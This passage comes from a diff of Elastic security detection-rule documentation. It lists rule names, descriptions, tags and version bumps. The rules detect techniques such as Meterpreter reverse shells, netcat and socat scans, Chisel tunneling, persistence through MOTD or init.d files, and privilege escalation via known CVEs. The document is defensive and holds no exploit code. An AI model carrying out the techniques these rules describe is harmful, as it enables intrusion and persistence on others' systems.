perform DLL Search Order Hijacking or backdoor and resign legitimate DLLs. |[Domain: Endpoint], [Data Source: Elastic Defend], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Tactic: Persistence], [Rule Type: BBR] |8.4.0 |102 -|<<potential-masquerading-as-system32-executable, Potential Masquerading as System32 Executable>> |Identifies suspicious instances of default system32 executables, either unsigned or signed with non-MS certificates. This could indicate the attempt to masquerade as system executables or backdoored and resigned legitimate executables. |[Domain: Endpoint], [Data Source: Elastic Defend], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Rule Type: BBR] |8.3.0 |1 +|<<potential-masquerading-as-system32-executable, Potential Masquerading as System32 Executable>> |Identifies suspicious instances of default system32 executables, either unsigned or signed with non-MS certificates. This could indicate the attempt to masquerade as system executables or backdoored and resigned legitimate executables. |[Domain: Endpoint], [Data Source: Elastic Defend], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Tactic: Persistence], [Rule Type: BBR] |8.3.0 |2 -|<<potential-masquerading-as-vlc-dll, Potential Masquerading as VLC DLL>> |Identifies instances of VLC-related DLLs which are not signed by the original developer. Attackers may name their payload as legitimate applications to blend into the environment, or embedding its malicious code within legitimate applications to deceive machine learning algorithms by incorporating authentic and benign code. |[Domain: Endpoint], [Data Source: Elastic Defend], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Rule Type: BBR] |8.3.0 |1 +|<<potential-masquerading-as-vlc-dll, Potential Masquerading as VLC DLL>> |Identifies instances of VLC-related DLLs which are not signed by the original developer. Attackers may name their payload as legitimate applications to blend into the environment, or embedding its malicious code within legitimate applications to deceive machine learning algorithms by incorporating authentic and benign code. |[Domain: Endpoint], [Data Source: Elastic Defend], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Tactic: Persistence], [Rule Type: BBR] |8.3.0 |2 -|<<potential-meterpreter-reverse-shell, Potential Meterpreter Reverse Shell>> |This detection rule identifies a sample of suspicious Linux system file reads used for system fingerprinting, leveraged by the Metasploit Meterpreter shell to gather information about the target that it is executing its shell on. Detecting this pattern is indicative of a successful meterpreter shell connection. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Execution] |8.6.0 |1 +|<<potential-meterpreter-reverse-shell, Potential Meterpreter Reverse Shell>> |This detection rule identifies a sample of suspicious Linux system file reads used for system fingerprinting, leveraged by the Metasploit Meterpreter shell to gather information about the target that it is executing its shell on. Detecting this pattern is indicative of a successful meterpreter shell connection. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Execution] |8.6.0 |2 |<<potential-microsoft-office-sandbox-evasion, Potential Microsoft Office Sandbox Evasion>> |Identifies the creation of a suspicious zip file prepended with special characters. Sandboxed Microsoft Office applications on macOS are allowed to write files that start with special characters, which can be combined with an AutoStart location to achieve sandbox evasion. |[Domain: Endpoint], [OS: macOS], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Defend] |8.3.0 |104 |<<potential-modification-of-accessibility-binaries, Potential Modification of Accessibility Binaries>> |Windows contains accessibility features that may be launched with a key combination before a user has logged in. An adversary can modify the way these programs are launched to get a command prompt or backdoor without logging in to the system. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |107 -|<<potential-network-scan-detected, Potential Network Scan Detected>> |This rule identifies a potential port scan. A port scan is a method utilized by attackers to systematically scan a target system or network for open ports, allowing them to identify available services and potential vulnerabilities. By mapping out the open ports, attackers can gather critical information to plan and execute targeted attacks, gaining unauthorized access, compromising security, and potentially leading to data breaches, unauthorized control, or further exploitation of the targeted system or network. This rule proposes threshold logic to check for connection attempts from one source host to 20 or more destination ports. |[Domain: Network], [Tactic: Discovery], [Tactic: Reconnaissance], [Use Case: Network Security Monitoring] |8.3.0 |3 +|<<potential-network-scan-detected, Potential Network Scan Detected>> |This rule identifies a potential port scan. A port scan is a method utilized by attackers to systematically scan a target system or network for open ports, allowing them to identify available services and potential vulnerabilities. By mapping out the open ports, attackers can gather critical information to plan and execute targeted attacks, gaining unauthorized access, compromising security, and potentially leading to data breaches, unauthorized control, or further exploitation of the targeted system or network. This rule proposes threshold logic to check for connection attempts from one source host to 20 or more destination ports. |[Domain: Network], [Tactic: Discovery], [Tactic: Reconnaissance], [Use Case: Network Security Monitoring] |8.3.0 |4 + +|<<potential-network-scan-executed-from-host, Potential Network Scan Executed From Host>> |This threshold rule monitors for the rapid execution of unix utilities that are capable of conducting network scans. Adversaries may leverage built-in tools such as ping, netcat or socat to execute ping sweeps across the network while attempting to evade detection or due to the lack of network mapping tools available on the compromised host. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Discovery], [Data Source: Elastic Defend] |8.3.0 |1 -|<<potential-network-share-discovery, Potential Network Share Discovery>> |Adversaries may look for folders and drives shared on remote systems to identify sources of information to gather as a precursor for collection and identify potential systems of interest for Lateral Movement. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Discovery], [Rule Type: BBR] |8.3.0 |1 +|<<potential-network-share-discovery, Potential Network Share Discovery>> |Adversaries may look for folders and drives shared on remote systems to identify sources of information to gather as a precursor for collection and identify potential systems of interest for Lateral Movement. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Discovery], [Tactic: Collection], [Rule Type: BBR] |8.3.0 |2 -|<<potential-network-sweep-detected, Potential Network Sweep Detected>> |This rule identifies a potential network sweep. A network sweep is a method used by attackers to scan a target network, identifying active hosts, open ports, and available services to gather information on vulnerabilities and weaknesses. This reconnaissance helps them plan subsequent attacks and exploit potential entry points for unauthorized access, data theft, or other malicious activities. This rule proposes threshold logic to check for connection attempts from one source host to 10 or more destination hosts on commonly used network services. |[Domain: Network], [Tactic: Discovery], [Tactic: Reconnaissance], [Use Case: Network Security Monitoring] |8.3.0 |3 +|<<potential-network-sweep-detected, Potential Network Sweep Detected>> |This rule identifies a potential network sweep. A network sweep is a method used by attackers to scan a target network, identifying active hosts, open ports, and available services to gather information on vulnerabilities and weaknesses. This reconnaissance helps them plan subsequent attacks and exploit potential entry points for unauthorized access, data theft, or other malicious activities. This rule proposes threshold logic to check for connection attempts from one source host to 10 or more destination hosts on commonly used network services. |[Domain: Network], [Tactic: Discovery], [Tactic: Reconnaissance], [Use Case: Network Security Monitoring] |8.3.0 |4 |<<potential-non-standard-port-http-https-connection, Potential Non-Standard Port HTTP/HTTPS connection>> |Identifies potentially malicious processes communicating via a port paring typically not associated with HTTP/HTTPS. For example, HTTP over port 8443 or port 440 as opposed to the traditional port 80 , 443. Adversaries may make changes to the standard port a protocol uses to bypass filtering or muddle analysis/parsing of network data. |[Domain: Endpoint], [OS: Linux], [OS: macOS], [Use Case: Threat Detection], [Tactic: Command and Control], [Rule Type: BBR], [Data Source: Elastic Defend] |8.3.0 |2 -|<<potential-non-standard-port-ssh-connection, Potential Non-Standard Port SSH connection>> |Identifies potentially malicious processes communicating via a port paring typically not associated with SSH. For example, SSH over port 2200 or port 2222 as opposed to the traditional port 22. Adversaries may make changes to the standard port a protocol uses to bypass filtering or muddle analysis/parsing of network data. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Command and Control], [OS: macOS], [Data Source: Elastic Defend] |8.3.0 |4 +|<<potential-non-standard-port-ssh-connection, Potential Non-Standard Port SSH connection>> |Identifies potentially malicious processes communicating via a port paring typically not associated with SSH. For example, SSH over port 2200 or port 2222 as opposed to the traditional port 22. Adversaries may make changes to the standard port a protocol uses to bypass filtering or muddle analysis/parsing of network data. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Command and Control], [OS: macOS], [Data Source: Elastic Defend] |8.3.0 |5 -|<<potential-openssh-backdoor-logging-activity, Potential OpenSSH Backdoor Logging Activity>> |Identifies a Secure Shell (SSH) client or server process creating or writing to a known SSH backdoor log file. Adversaries may modify SSH related binaries for persistence or credential access via patching sensitive functions to enable unauthorized access or to log SSH credentials for exfiltration. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Persistence], [Tactic: Credential Access], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |106 +|<<potential-openssh-backdoor-logging-activity, Potential OpenSSH Backdoor Logging Activity>> |Identifies a Secure Shell (SSH) client or server process creating or writing to a known SSH backdoor log file. Adversaries may modify SSH related binaries for persistence or credential access via patching sensitive functions to enable unauthorized access or to log SSH credentials for exfiltration. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Persistence], [Tactic: Credential Access], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |107 |<<potential-outgoing-rdp-connection-by-unusual-process, Potential Outgoing RDP Connection by Unusual Process>> |Adversaries may attempt to connect to a remote system over Windows Remote Desktop Protocol (RDP) to achieve lateral movement. Adversaries may avoid using the Microsoft Terminal Services Client (mstsc.exe) binary to establish an RDP connection to evade detection. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Lateral Movement], [Data Source: Elastic Defend] |8.3.0 |1 @@ -1152,11 +1194,11 @@ and their rule type is `machine_learning`. |<<potential-password-spraying-of-microsoft-365-user-accounts, Potential Password Spraying of Microsoft 365 User Accounts>> |Identifies a high number (25) of failed Microsoft 365 user authentication attempts from a single IP address within 30 minutes, which could be indicative of a password spraying attack. An adversary may attempt a password spraying attack to obtain unauthorized access to user accounts. |[Domain: Cloud], [Data Source: Microsoft 365], [Use Case: Identity and Access Audit], [Tactic: Credential Access] |8.3.0 |102 -|<<potential-persistence-through-motd-file-creation-detected, Potential Persistence Through MOTD File Creation Detected>> |Message of the day (MOTD) is the message that is presented to the user when a user connects to a Linux server via SSH or a serial connection. Linux systems contain several default MOTD files located in the "/etc/update-motd.d/" and "/usr/lib/update-notifier/" directories. These scripts run as the root user every time a user connects over SSH or a serial connection. Adversaries may create malicious MOTD files that grant them persistence onto the target every time a user connects to the system by executing a backdoor script or command. This rule detects the creation of potentially malicious files within the default MOTD file directories. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Persistence], [Data Source: Elastic Endgame], [Resources: Investigation Guide], [Data Source: Elastic Defend] |8.6.0 |5 +|<<potential-persistence-through-motd-file-creation-detected, Potential Persistence Through MOTD File Creation Detected>> |Message of the day (MOTD) is the message that is presented to the user when a user connects to a Linux server via SSH or a serial connection. Linux systems contain several default MOTD files located in the "/etc/update-motd.d/" and "/usr/lib/update-notifier/" directories. These scripts run as the root user every time a user connects over SSH or a serial connection. Adversaries may create malicious MOTD files that grant them persistence onto the target every time a user connects to the system by executing a backdoor script or command. This rule detects the creation of potentially malicious files within the default MOTD file directories. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Persistence], [Data Source: Elastic Endgame], [Resources: Investigation Guide], [Data Source: Elastic Defend] |8.6.0 |6 -|<<potential-persistence-through-run-control-detected, Potential Persistence Through Run Control Detected>> |This rule monitors the creation/alteration of the rc.local file by a previously unknown process executable through the use of the new terms rule type. The /etc/rc.local file is used to start custom applications, services, scripts or commands during start-up. The rc.local file has mostly been replaced by Systemd. However, through the "systemd-rc-local-generator", rc.local files can be converted to services that run at boot. Adversaries may alter rc.local to execute malicious code at start-up, and gain persistence onto the system. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Persistence], [Data Source: Elastic Endgame], [Resources: Investigation Guide], [Data Source: Elastic Defend] |8.6.0 |106 +|<<potential-persistence-through-run-control-detected, Potential Persistence Through Run Control Detected>> |This rule monitors the creation/alteration of the rc.local file by a previously unknown process executable through the use of the new terms rule type. The /etc/rc.local file is used to start custom applications, services, scripts or commands during start-up. The rc.local file has mostly been replaced by Systemd. However, through the "systemd-rc-local-generator", rc.local files can be converted to services that run at boot. Adversaries may alter rc.local to execute malicious code at start-up, and gain persistence onto the system. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Persistence], [Data Source: Elastic Endgame], [Resources: Investigation Guide], [Data Source: Elastic Defend] |8.6.0 |107 -|<<potential-persistence-through-init-d-detected, Potential Persistence Through init.d Detected>> |Files that are placed in the /etc/init.d/ directory in Unix can be used to start custom applications, services, scripts or commands during start-up. Init.d has been mostly replaced in favor of Systemd. However, the "systemd-sysv-generator" can convert init.d files to service unit files that run at boot. Adversaries may add or alter files located in the /etc/init.d/ directory to execute malicious code upon boot in order to gain persistence on the system. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Persistence], [Data Source: Elastic Endgame], [Resources: Investigation Guide], [Data Source: Elastic Defend] |8.6.0 |5 +|<<potential-persistence-through-init-d-detected, Potential Persistence Through init.d Detected>> |Files that are placed in the /etc/init.d/ directory in Unix can be used to start custom applications, services, scripts or commands during start-up. Init.d has been mostly replaced in favor of Systemd. However, the "systemd-sysv-generator" can convert init.d files to service unit files that run at boot. Adversaries may add or alter files located in the /etc/init.d/ directory to execute malicious code upon boot in order to gain persistence on the system. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Persistence], [Data Source: Elastic Endgame], [Resources: Investigation Guide], [Data Source: Elastic Defend] |8.6.0 |6 |<<potential-persistence-via-atom-init-script-modification, Potential Persistence via Atom Init Script Modification>> |Identifies modifications to the Atom desktop text editor Init File. Adversaries may add malicious JavaScript code to the init.coffee file that will be executed upon the Atom application opening. |[Domain: Endpoint], [OS: macOS], [Use Case: Threat Detection], [Tactic: Persistence], [Data Source: Elastic Defend] |8.3.0 |104 @@ -1164,9 +1206,9 @@ and their rule type is `machine_learning`. |<<potential-persistence-via-periodic-tasks, Potential Persistence via Periodic Tasks>> |Identifies the creation or modification of the default configuration for periodic tasks. Adversaries may abuse periodic tasks to execute malicious code or maintain persistence. |[Domain: Endpoint], [OS: macOS], [Use Case: Threat Detection], [Tactic: Persistence], [Data Source: Elastic Defend] |8.3.0 |104 -|<<potential-persistence-via-time-provider-modification, Potential Persistence via Time Provider Modification>> |Identifies modification of the Time Provider. Adversaries may establish persistence by registering and enabling a malicious DLL as a time provider. Windows uses the time provider architecture to obtain accurate time stamps from other network devices or clients in the network. Time providers are implemented in the form of a DLL file which resides in the System32 folder. The service W32Time initiates during the startup of Windows and loads w32time.dll. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |104 +|<<potential-persistence-via-time-provider-modification, Potential Persistence via Time Provider Modification>> |Identifies modification of the Time Provider. Adversaries may establish persistence by registering and enabling a malicious DLL as a time provider. Windows uses the time provider architecture to obtain accurate time stamps from other network devices or clients in the network. Time providers are implemented in the form of a DLL file which resides in the System32 folder. The service W32Time initiates during the startup of Windows and loads w32time.dll. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Tactic: Privilege Escalation], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |105 -|<<potential-port-monitor-or-print-processor-registration-abuse, Potential Port Monitor or Print Processor Registration Abuse>> |Identifies port monitor and print processor registry modifications. Adversaries may abuse port monitor and print processors to run malicious DLLs during system boot that will be executed as SYSTEM for privilege escalation and/or persistence, if permissions allow writing a fully-qualified pathname for that DLL. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |104 +|<<potential-port-monitor-or-print-processor-registration-abuse, Potential Port Monitor or Print Processor Registration Abuse>> |Identifies port monitor and print processor registry modifications. Adversaries may abuse port monitor and print processors to run malicious DLLs during system boot that will be executed as SYSTEM for privilege escalation and/or persistence, if permissions allow writing a fully-qualified pathname for that DLL. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |105 |<<potential-powershell-hacktool-script-by-function-names, Potential PowerShell HackTool Script by Function Names>> |Detects known PowerShell offensive tooling functions names in PowerShell scripts. Attackers commonly use out-of-the-box offensive tools without modifying the code. This rule aim is to take advantage of that. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Execution], [Data Source: PowerShell Logs] |8.3.0 |6 @@ -1174,97 +1216,105 @@ and their rule type is `machine_learning`. |<<potential-privacy-control-bypass-via-tccdb-modification, Potential Privacy Control Bypass via TCCDB Modification>> |Identifies the use of sqlite3 to directly modify the Transparency, Consent, and Control (TCC) SQLite database. This may indicate an attempt to bypass macOS privacy controls, including access to sensitive resources like the system camera, microphone, address book, and calendar. |[Domain: Endpoint], [OS: macOS], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Defend] |8.3.0 |104 -|<<potential-privilege-escalation-through-writable-docker-socket, Potential Privilege Escalation through Writable Docker Socket>> |This rule monitors for the usage of Docker runtime sockets to escalate privileges on Linux systems. Docker sockets by default are only be writable by the root user and docker group. Attackers that have permissions to write to these sockets may be able to create and run a container that allows them to escalate privileges and gain further access onto the host file system. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Domain: Container], [Data Source: Elastic Defend] |8.3.0 |2 +|<<potential-privilege-escalation-through-writable-docker-socket, Potential Privilege Escalation through Writable Docker Socket>> |This rule monitors for the usage of Docker runtime sockets to escalate privileges on Linux systems. Docker sockets by default are only be writable by the root user and docker group. Attackers that have permissions to write to these sockets may be able to create and run a container that allows them to escalate privileges and gain further access onto the host file system. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Domain: Container], [Data Source: Elastic Defend] |8.3.0 |3 + +|<<potential-privilege-escalation-via-cve-2023-4911, Potential Privilege Escalation via CVE-2023-4911>> |This rule detects potential privilege escalation attempts through Looney Tunables (CVE-2023-4911). Looney Tunables is a buffer overflow vulnerability in GNU C Library's dynamic loader's processing of the GLIBC_TUNABLES environment variable. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Use Case: Vulnerability], [Data Source: Elastic Defend] |8.6.0 |2 -|<<potential-privilege-escalation-via-cve-2023-4911, Potential Privilege Escalation via CVE-2023-4911>> |This rule detects potential privilege escalation attempts through Looney Tunables (CVE-2023-4911). Looney Tunables is a buffer overflow vulnerability in GNU C Library's dynamic loader's processing of the GLIBC_TUNABLES environment variable. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Use Case: Vulnerability], [Data Source: Elastic Defend] |8.6.0 |1 +|<<potential-privilege-escalation-via-container-misconfiguration, Potential Privilege Escalation via Container Misconfiguration>> |This rule monitors for the execution of processes that interact with Linux containers through an interactive shell without root permissions. Utilities such as runc and ctr are universal command-line utilities leveraged to interact with containers via root permissions. On systems where the access to these utilities are misconfigured, attackers might be able to create and run a container that mounts the root folder or spawn a privileged container vulnerable to a container escape attack, which might allow them to escalate privileges and gain further access onto the host file system. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Domain: Container], [Data Source: Elastic Defend] |8.3.0 |3 -|<<potential-privilege-escalation-via-container-misconfiguration, Potential Privilege Escalation via Container Misconfiguration>> |This rule monitors for the execution of processes that interact with Linux containers through an interactive shell without root permissions. Utilities such as runc and ctr are universal command-line utilities leveraged to interact with containers via root permissions. On systems where the access to these utilities are misconfigured, attackers might be able to create and run a container that mounts the root folder or spawn a privileged container vulnerable to a container escape attack, which might allow them to escalate privileges and gain further access onto the host file system. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Domain: Container], [Data Source: Elastic Defend] |8.3.0 |2 +|<<potential-privilege-escalation-via-installerfiletakeover, Potential Privilege Escalation via InstallerFileTakeOver>> |Identifies a potential exploitation of InstallerTakeOver (CVE-2021-41379) default PoC execution. Successful exploitation allows an unprivileged user to escalate privileges to SYSTEM. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Resources: Investigation Guide], [Use Case: Vulnerability], [Data Source: Elastic Defend] |8.3.0 |108 -|<<potential-privilege-escalation-via-installerfiletakeover, Potential Privilege Escalation via InstallerFileTakeOver>> |Identifies a potential exploitation of InstallerTakeOver (CVE-2021-41379) default PoC execution. Successful exploitation allows an unprivileged user to escalate privileges to SYSTEM. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Resources: Investigation Guide], [Use Case: Vulnerability], [Data Source: Elastic Defend] |8.3.0 |107 +|<<potential-privilege-escalation-via-overlayfs, Potential Privilege Escalation via OverlayFS>> |Identifies an attempt to exploit a local privilege escalation (CVE-2023-2640 and CVE-2023-32629) via a flaw in Ubuntu's modifications to OverlayFS. These flaws allow the creation of specialized executables, which, upon execution, grant the ability to escalate privileges to root on the affected machine. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Use Case: Vulnerability], [Data Source: Elastic Defend] |8.3.0 |3 -|<<potential-privilege-escalation-via-overlayfs, Potential Privilege Escalation via OverlayFS>> |Identifies an attempt to exploit a local privilege escalation (CVE-2023-2640 and CVE-2023-32629) via a flaw in Ubuntu's modifications to OverlayFS. These flaws allow the creation of specialized executables, which, upon execution, grant the ability to escalate privileges to root on the affected machine. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Use Case: Vulnerability], [Data Source: Elastic Defend] |8.3.0 |2 +|<<potential-privilege-escalation-via-pkexec, Potential Privilege Escalation via PKEXEC>> |Identifies an attempt to exploit a local privilege escalation in polkit pkexec (CVE-2021-4034) via unsecure environment variable injection. Successful exploitation allows an unprivileged user to escalate to the root user. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Data Source: Elastic Endgame], [Use Case: Vulnerability], [Data Source: Elastic Defend] |8.3.0 |106 -|<<potential-privilege-escalation-via-pkexec, Potential Privilege Escalation via PKEXEC>> |Identifies an attempt to exploit a local privilege escalation in polkit pkexec (CVE-2021-4034) via unsecure environment variable injection. Successful exploitation allows an unprivileged user to escalate to the root user. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Data Source: Elastic Endgame], [Use Case: Vulnerability], [Data Source: Elastic Defend] |8.3.0 |105 +|<<potential-privilege-escalation-via-python-cap-setuid, Potential Privilege Escalation via Python cap_setuid>> |This detection rule monitors for the execution of a system command with setuid or setgid capabilities via Python, followed by a uid or gid change to the root user. This sequence of events may indicate successful privilege escalation. Setuid (Set User ID) and setgid (Set Group ID) are Unix-like OS features that enable processes to run with elevated privileges, based on the file owner or group. Threat actors can exploit these attributes to escalate privileges to the privileges that are set on the binary that is being executed. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Data Source: Elastic Defend] |8.3.0 |1 -|<<potential-privilege-escalation-via-recently-compiled-executable, Potential Privilege Escalation via Recently Compiled Executable>> |This rule monitors a sequence involving a program compilation event followed by its execution and a subsequent alteration of UID permissions to root privileges. This behavior can potentially indicate the execution of a kernel or software privilege escalation exploit. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Use Case: Vulnerability], [Data Source: Elastic Defend] |8.3.0 |1 +|<<potential-privilege-escalation-via-recently-compiled-executable, Potential Privilege Escalation via Recently Compiled Executable>> |This rule monitors a sequence involving a program compilation event followed by its execution and a subsequent alteration of UID permissions to root privileges. This behavior can potentially indicate the execution of a kernel or software privilege escalation exploit. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Use Case: Vulnerability], [Data Source: Elastic Defend] |8.3.0 |2 |<<potential-privilege-escalation-via-sudoers-file-modification, Potential Privilege Escalation via Sudoers File Modification>> |A sudoers file specifies the commands users or groups can run and from which terminals. Adversaries can take advantage of these configurations to execute commands as other users or spawn processes with higher privileges. |[Domain: Endpoint], [OS: Linux], [OS: macOS], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Data Source: Elastic Defend] |8.3.0 |103 -|<<potential-privilege-escalation-via-uid-int-max-bug-detected, Potential Privilege Escalation via UID INT_MAX Bug Detected>> |This rule monitors for the execution of the systemd-run command by a user with a UID that is larger than the maximum allowed UID size (INT_MAX). Some older Linux versions were affected by a bug which allows user accounts with a UID greater than INT_MAX to escalate privileges by spawning a shell through systemd-run. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Data Source: Elastic Defend] |8.3.0 |2 +|<<potential-privilege-escalation-via-uid-int-max-bug-detected, Potential Privilege Escalation via UID INT_MAX Bug Detected>> |This rule monitors for the execution of the systemd-run command by a user with a UID that is larger than the maximum allowed UID size (INT_MAX). Some older Linux versions were affected by a bug which allows user accounts with a UID greater than INT_MAX to escalate privileges by spawning a shell through systemd-run. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Data Source: Elastic Defend] |8.3.0 |3 -|<<potential-privileged-escalation-via-samaccountname-spoofing, Potential Privileged Escalation via SamAccountName Spoofing>> |Identifies a suspicious computer account name rename event, which may indicate an attempt to exploit CVE-2021-42278 to elevate privileges from a standard domain user to a user with domain admin privileges. CVE-2021-42278 is a security vulnerability that allows potential attackers to impersonate a domain controller via samAccountName attribute spoofing. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Tactic: Privilege Escalation], [Use Case: Active Directory Monitoring], [Data Source: Active Directory], [Use Case: Vulnerability] |8.3.0 |105 +|<<potential-privileged-escalation-via-samaccountname-spoofing, Potential Privileged Escalation via SamAccountName Spoofing>> |Identifies a suspicious computer account name rename event, which may indicate an attempt to exploit CVE-2021-42278 to elevate privileges from a standard domain user to a user with domain admin privileges. CVE-2021-42278 is a security vulnerability that allows potential attackers to impersonate a domain controller via samAccountName attribute spoofing. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Tactic: Privilege Escalation], [Use Case: Active Directory Monitoring], [Data Source: Active Directory], [Use Case: Vulnerability] |8.3.0 |106 |<<potential-process-herpaderping-attempt, Potential Process Herpaderping Attempt>> |Identifies process execution followed by a file overwrite of an executable by the same parent process. This may indicate an evasion attempt to execute malicious code in a stealthy way. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Defend] |8.3.0 |105 -|<<potential-process-injection-via-powershell, Potential Process Injection via PowerShell>> |Detects the use of Windows API functions that are commonly abused by malware and security tools to load malicious code or inject it into remote processes. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Resources: Investigation Guide], [Data Source: PowerShell Logs] |8.3.0 |107 +|<<potential-process-injection-from-malicious-document, Potential Process Injection from Malicious Document>> |Identifies child processes of frequently targeted Microsoft Office applications (Word, PowerPoint, Excel) with unusual process arguments and path. This behavior is often observed during exploitation of Office applications or from documents with malicious macros. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Tactic: Privilege Escalation], [Tactic: Initial Access], [Rule Type: BBR], [Data Source: Elastic Defend] |8.3.0 |1 -|<<potential-protocol-tunneling-via-chisel-client, Potential Protocol Tunneling via Chisel Client>> |This rule monitors for common command line flags leveraged by the Chisel client utility followed by a connection attempt. Chisel is a command-line utility used for creating and managing TCP and UDP tunnels, enabling port forwarding and secure communication between machines. Attackers can abuse the Chisel utility to establish covert communication channels, bypass network restrictions, and carry out malicious activities by creating tunnels that allow unauthorized access to internal systems. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Command and Control], [Data Source: Elastic Defend] |8.3.0 |1 +|<<potential-process-injection-via-powershell, Potential Process Injection via PowerShell>> |Detects the use of Windows API functions that are commonly abused by malware and security tools to load malicious code or inject it into remote processes. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Tactic: Execution], [Resources: Investigation Guide], [Data Source: PowerShell Logs] |8.3.0 |108 -|<<potential-protocol-tunneling-via-chisel-server, Potential Protocol Tunneling via Chisel Server>> |This rule monitors for common command line flags leveraged by the Chisel server utility followed by a received connection within a timespan of 1 minute. Chisel is a command-line utility used for creating and managing TCP and UDP tunnels, enabling port forwarding and secure communication between machines. Attackers can abuse the Chisel utility to establish covert communication channels, bypass network restrictions, and carry out malicious activities by creating tunnels that allow unauthorized access to internal systems. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Command and Control], [Data Source: Elastic Defend] |8.3.0 |1 +|<<potential-protocol-tunneling-via-chisel-client, Potential Protocol Tunneling via Chisel Client>> |This rule monitors for common command line flags leveraged by the Chisel client utility followed by a connection attempt. Chisel is a command-line utility used for creating and managing TCP and UDP tunnels, enabling port forwarding and secure communication between machines. Attackers can abuse the Chisel utility to establish covert communication channels, bypass network restrictions, and carry out malicious activities by creating tunnels that allow unauthorized access to internal systems. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Command and Control], [Data Source: Elastic Defend] |8.3.0 |2 -|<<potential-protocol-tunneling-via-earthworm, Potential Protocol Tunneling via EarthWorm>> |Identifies the execution of the EarthWorm tunneler. Adversaries may tunnel network communications to and from a victim system within a separate protocol to avoid detection and network filtering, or to enable access to otherwise unreachable systems. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Command and Control], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] 